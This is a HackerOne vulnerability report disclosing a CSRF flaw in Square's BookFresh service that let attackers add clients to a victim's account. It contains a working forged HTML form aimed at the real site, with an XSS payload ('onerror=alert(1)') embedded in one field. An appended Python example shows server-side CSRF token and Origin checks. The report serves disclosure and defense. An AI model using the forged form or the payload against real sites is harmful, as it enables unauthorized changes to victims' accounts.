Square: CSRF on adding clients

ID H1:30004
Type hackerone
Reporter anshuman_bh
Modified 2015-02-04T19:17:48


  1. Authenticate to an account.

  2. Trick the victim into submitting the following HTML:

<html>
<body>
<form action="https://www.bookfresh.com/index.html" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="action" value="add_customer" />
  <input type="hidden" name="view" value="customer" />
  <input type="hidden" name="action" value="add_customer" />
  <input type="hidden" name="view" value="customer" />
  <input type="hidden" name="first_name" value="csrf" />
  <input type="hidden" name="last_name" value="test" />
  <input type="hidden" name="email" value=" " />
  <input type="hidden" name="phone" value=" " />
  <input type="hidden" name="phone_type" value="0" />
  <input type="hidden" name="cellphone" value=" " />
  <input type="hidden" name="cellphone_type" value="0" />
  <input type="hidden" name="company_name" value=" " />
  <input type="hidden" name="address1" value=" " />
  <input type="hidden" name="address2" value=" " />
  <input type="hidden" name="city" value=" " />
  <input type="hidden" name="state" value=" " />
  <input type="hidden" name="zipcode" value=" " />
  <input type="hidden" name="birthday_month" value="1" />
  <input type="hidden" name="birthday_day" value="1" />
  <input type="hidden" name="birthday_year" value="1920" />
  <input type="hidden" name="notes" value=" " />
  <input type="hidden" name="merchant_email" value=""><img src=x onerror=alert(1)> "><img src=x onerror=alert(1)><anshuman.bhartiya+4@gmail.com>" />
  <input type="hidden" name="subject" value="You're invited to book online" />
  <input type="hidden" name="greeting" value="Dear csrf," />
  <input type="hidden" name="message" value="As one of my most valued clients, I wanted to tell you about a new service I am now offering: online appointments. It's a fast and easy way for you to make an appointment with me, and it's completely free. To get started, just click the link below that will take you to my personalized online calendar.
Thank you, - "" " />
  <input type="hidden" name="merchant_hourtown_address" value="https://www.bookfresh.com/" />
  <input type="hidden" name="_submit_button" value="Add Customer" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>

  3. You will be redirected to a page which says "The page isn't redirecting properly" (Tested in Firefox). See screenshot.

  4. But, then when you go to clients, you will notice that a new client has been added. See screenshot.

An attacker can trick victim users into adding clients without the victim's knowledge.
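
The server-side check that rejects a cross-site form post like the one above, as an added example that is not part of the original report and not Square's code. The function names, the `csrf_token` field, the allowed-origin list and the HMAC-per-session token scheme are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed values for illustration; only "add_customer" and the host come from the report.
ALLOWED_ORIGINS = {"https://www.bookfresh.com"}
STATE_CHANGING_ACTIONS = {"add_customer"}
SERVER_KEY = secrets.token_bytes(32)  # constructed per-process secret


def issue_csrf_token(session_id):
    """Token the server embeds as a hidden field in the forms it renders itself."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def origin_of(headers):
    """Origin header, falling back to the origin part of Referer; None if both are absent."""
    if headers.get("Origin"):
        return headers["Origin"]
    if headers.get("Referer"):
        parts = urlsplit(headers["Referer"])
        return f"{parts.scheme}://{parts.netloc}"
    return None


def check_request(method, headers, form, session_id):
    """Return (allowed, reason) for one request carrying the victim's session cookie."""
    if form.get("action") not in STATE_CHANGING_ACTIONS:
        return True, "not a state-changing action"
    if method != "POST":
        return False, "state-changing action requires POST"
    origin = origin_of(headers)
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, "cross-origin submission"
    # A page on another origin cannot read the token, so it cannot include it.
    sent = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(sent, issue_csrf_token(session_id).encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed sample requests: the forged form from the report, and the site's own form.
SESSION = "constructed-session-id"
FORGED = {"action": "add_customer", "view": "customer", "first_name": "csrf"}
LEGIT = dict(FORGED, first_name="Alice", csrf_token=issue_csrf_token(SESSION))
```

The Origin check alone is not sufficient because some clients omit both headers, which is why the token comparison still runs when `origin_of` returns `None`.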